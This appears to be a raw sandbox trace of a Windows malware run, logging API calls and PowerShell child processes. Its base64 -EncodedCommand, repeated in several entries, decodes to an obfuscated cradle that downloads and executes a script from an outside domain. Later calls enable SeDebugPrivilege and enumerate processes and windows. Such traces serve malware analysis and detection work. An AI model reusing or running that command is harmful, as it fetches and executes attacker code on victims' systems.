	[0872.939] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0872.939] CoTaskMemAlloc (cb=0x2f4) returned 0x1be490
	[0872.939] RtlMoveMemory (in: Destination=0x1be490, Source=0x1ba6d0b2, Length=0x2f2 | out: Destination=0x1be490) 
	[0872.939] CoTaskMemFree (pv=0x1be490) 
	[0872.940] LocalFree (hMem=0x1ba6d070) returned 0x0
	[0872.941] CoTaskMemAlloc (cb=0x804) returned 0x1ba80aa0
	[0872.941] GetConsoleTitleW (in: lpConsoleTitle=0x1ba80aa0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0873.726] CoTaskMemFree (pv=0x1ba80aa0) 
	[0873.736] CoTaskMemAlloc (cb=0x38e) returned 0x1ba6d070
	[0873.736] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c91dea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f20ae0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f20ae0*(hProcess=0x360, hThread=0x348, dwProcessId=0x2544, dwThreadId=0x2548)) returned 1
	[0875.236] CoTaskMemFree (pv=0x1ba6d070) 
	[0875.237] CloseHandle (hObject=0x348) returned 1
	[0875.238] CoTaskMemAlloc (cb=0x3b) returned 0x1ba484a0
	[0875.238] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c91df48, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c91df48) returned 0x4550
	[0875.238] CoTaskMemFree (pv=0x1ba484a0) 
	[0875.241] GetCurrentProcess () returned 0xffffffffffffffff
	[0875.242] GetCurrentProcess () returned 0xffffffffffffffff
	[0875.242] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c91e028, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c91e028*=0x348) returned 1

Process:
	id = "154"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x46e18000"
	os_pid = "0x105c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 803
	os_tid = 0x1050

	[0473.065] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 881
	os_tid = 0x125c


Thread:
	id = 895
	os_tid = 0x84c


Thread:
	id = 1336
	os_tid = 0x1e38


Thread:
	id = 1340
	os_tid = 0x1e54


Thread:
	id = 1582
	os_tid = 0x2134


Thread:
	id = 1696
	os_tid = 0x23b8


Process:
	id = "155"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x38c26000"
	os_pid = "0x1078"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 806
	os_tid = 0x1068

	[0473.836] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 882
	os_tid = 0x4bc


Thread:
	id = 896
	os_tid = 0x854


Process:
	id = "156"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x45635000"
	os_pid = "0x1528"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 816
	os_tid = 0x10ac

	[0480.117] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0827.928] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0835.423] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.424] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.424] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0835.424] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0914.348] sprintf_s (in: _DstBuf=0x14eed8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0938.603] GetVersionExW (in: lpVersionInformation=0x14d9e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d9e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0938.605] GetVersionExW (in: lpVersionInformation=0x14d9e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d9e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0938.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0938.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0938.619] GetVersionExW (in: lpVersionInformation=0x14d750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0938.620] SetErrorMode (uMode=0x1) returned 0x1
	[0938.621] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d8b0 | out: lpFileInformation=0x14d8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0938.622] SetErrorMode (uMode=0x1) returned 0x1
	[0938.940] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14db20 | out: lpdwHandle=0x14db20) returned 0x94c
	[0938.943] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e172f0 | out: lpData=0x2e172f0) returned 1
	[0938.945] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2e1738c, puLen=0x14da90) returned 1
	[0938.948] lstrlenW (lpString="䅁") returned 1
	[0938.957] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e17468, puLen=0x14da00) returned 1
	[0938.958] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0938.960] CoTaskMemAlloc (cb=0x2e) returned 0x3d0440
	[0938.960] lstrcpyW (in: lpString1=0x3d0440, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0938.961] CoTaskMemFree (pv=0x3d0440) 
	[0938.961] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e174bc, puLen=0x14da00) returned 1
	[0938.961] lstrlenW (lpString="System.Management.Automation") returned 28
	[0938.961] CoTaskMemAlloc (cb=0x3c) returned 0x349110
	[0938.961] lstrcpyW (in: lpString1=0x349110, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0938.961] CoTaskMemFree (pv=0x349110) 
	[0938.961] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e17518, puLen=0x14da00) returned 1
	[0938.961] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0938.961] CoTaskMemAlloc (cb=0x20) returned 0x3d1530
	[0938.961] lstrcpyW (in: lpString1=0x3d1530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0938.961] CoTaskMemFree (pv=0x3d1530) 
	[0938.962] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e17558, puLen=0x14da00) returned 1
	[0938.962] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0938.962] CoTaskMemAlloc (cb=0x44) returned 0x349110
	[0938.962] lstrcpyW (in: lpString1=0x349110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0938.962] CoTaskMemFree (pv=0x349110) 
	[0938.962] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e175c0, puLen=0x14da00) returned 1
	[0938.962] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0938.962] CoTaskMemAlloc (cb=0x76) returned 0x36ec30
	[0938.962] lstrcpyW (in: lpString1=0x36ec30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0938.962] CoTaskMemFree (pv=0x36ec30) 
	[0938.962] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e1765c, puLen=0x14da00) returned 1
	[0938.962] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0938.962] CoTaskMemAlloc (cb=0x44) returned 0x349110
	[0938.962] lstrcpyW (in: lpString1=0x349110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0938.962] CoTaskMemFree (pv=0x349110) 
	[0938.962] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e176c0, puLen=0x14da00) returned 1
	[0938.962] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0938.962] CoTaskMemAlloc (cb=0x58) returned 0x38d970
	[0938.962] lstrcpyW (in: lpString1=0x38d970, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0938.962] CoTaskMemFree (pv=0x38d970) 
	[0938.962] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e1773c, puLen=0x14da00) returned 1
	[0938.962] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0938.962] CoTaskMemAlloc (cb=0x20) returned 0x3d1530
	[0938.962] lstrcpyW (in: lpString1=0x3d1530, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0938.962] CoTaskMemFree (pv=0x3d1530) 
	[0938.963] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x2e173e4, puLen=0x14da00) returned 1
	[0938.963] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0938.963] CoTaskMemAlloc (cb=0x66) returned 0x3c5f00
	[0938.963] lstrcpyW (in: lpString1=0x3c5f00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0938.963] CoTaskMemFree (pv=0x3c5f00) 
	[0938.963] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x0, puLen=0x14da00) returned 0
	[0938.963] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x0, puLen=0x14da00) returned 0
	[0938.963] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14da08, puLen=0x14da00 | out: lplpBuffer=0x14da08*=0x0, puLen=0x14da00) returned 0
	[0938.963] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2e1738c, puLen=0x14d9d0) returned 1
	[0938.964] CoTaskMemAlloc (cb=0x204) returned 0x371b00
	[0938.964] VerLanguageNameW (in: wLang=0x0, szLang=0x371b00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0938.965] CoTaskMemFree (pv=0x371b00) 
	[0938.965] VerQueryValueW (in: pBlock=0x2e172f0, lpSubBlock="\\", lplpBuffer=0x14da28, puLen=0x14da20 | out: lplpBuffer=0x14da28*=0x2e17318, puLen=0x14da20) returned 1
	[0938.971] GetCurrentProcessId () returned 0x1528
	[0938.977] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14c950 | out: lpLuid=0x14c950*(LowPart=0x14, HighPart=0)) returned 1
	[0939.244] GetCurrentProcess () returned 0xffffffffffffffff
	[0939.245] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14c970 | out: TokenHandle=0x14c970*=0x2d0) returned 1
	[0939.246] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2e1ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0939.247] CloseHandle (hObject=0x2d0) returned 1
	[0939.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1528) returned 0x2d0
	[0939.260] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2e1abd0, cb=0x200, lpcbNeeded=0x14d988 | out: lphModule=0x2e1abd0, lpcbNeeded=0x14d988) returned 1
	[0939.263] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2e1ae40, cb=0x18 | out: lpmodinfo=0x2e1ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0939.264] CoTaskMemAlloc (cb=0x804) returned 0x3d25d0
	[0939.264] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x3d25d0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0939.264] CoTaskMemFree (pv=0x3d25d0) 
	[0939.265] CoTaskMemAlloc (cb=0x804) returned 0x3d25d0
	[0939.265] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x3d25d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0939.266] CoTaskMemFree (pv=0x3d25d0) 
	[0939.266] CloseHandle (hObject=0x2d0) returned 1
	[0939.274] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1528) returned 0x2d0
	[0939.275] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x14dab8 | out: lpExitCode=0x14dab8*=0x103) returned 1
	[0939.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e1b088, Length=0x20000, ResultLength=0x14da80 | out: SystemInformation=0x12e1b088, ResultLength=0x14da80*=0x4a190) returned 0xc0000004
	[0939.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e3b0b8, Length=0x4c990, ResultLength=0x14da80 | out: SystemInformation=0x12e3b0b8, ResultLength=0x14da80*=0x4a190) returned 0x0
	[0939.653] EnumWindows (lpEnumFunc=0x2b166ac, lParam=0x0) 
	[0939.655] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.655] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x558
	[0939.655] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.655] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x538
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x778
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x778
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.656] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x460
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2440
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x24d8
	[0939.657] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1aa4
